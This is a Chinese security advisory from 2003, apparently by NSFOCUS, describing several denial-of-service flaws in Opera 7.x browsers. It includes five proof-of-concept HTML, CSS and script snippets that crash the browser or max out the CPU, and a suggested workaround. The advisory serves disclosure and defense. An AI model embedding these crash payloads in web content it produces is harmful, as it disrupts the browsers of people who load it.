Opera多个拒绝服务攻击漏洞
发布日期:2003-06-30
更新日期:2003-07-07
受影响系统:Opera Software Opera Web Browser 7.11b
Opera Software Opera Web Browser 7.11
Opera Software Opera Web Browser 7.10
Opera Software Opera Web Browser 7.03 win32
描述:
BUGTRAQ ID:
8066
Opera是一款多平台的WEB浏览器。
Opera在处理部分HTML代码时存在问题,远程攻击者可以利用这个漏洞使Opera停止响应。
当浏览器尝试对包含畸形代码的文档进行解析时,可导致浏览器崩溃或停止响应。此漏洞正式存在于Windows下的Opera系统,其他版本还不确定是否受此漏洞影响。
<*来源::: Operash ::.
链接:
http://www.securityfocus.com/bid/8066
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[ CODE 1 ]
12个字节数据 "<!DOCTYPE" + NULL(\x00) + 1byte + ">"可导致CPU达到100%并停止响应:
-----------------------------------------------------------------
<!DOCTYPE[\x00]A>
-----------------------------------------------------------------
[ CODE 2 ]
异常终止:
-----------------------------------------------------------------
<form></form><script>document.forms[0].submit()</script>
-----------------------------------------------------------------
[ CODE 3 ]
异常终止:
-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------
[ CODE 4 ]
异常终止:
-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------
[ CODE 5 ]
CPU利用率会达到100%:
-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 关闭JavaScript和CSS Author Mode。
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com浏览次数:2776
严重程度:0(网友投票)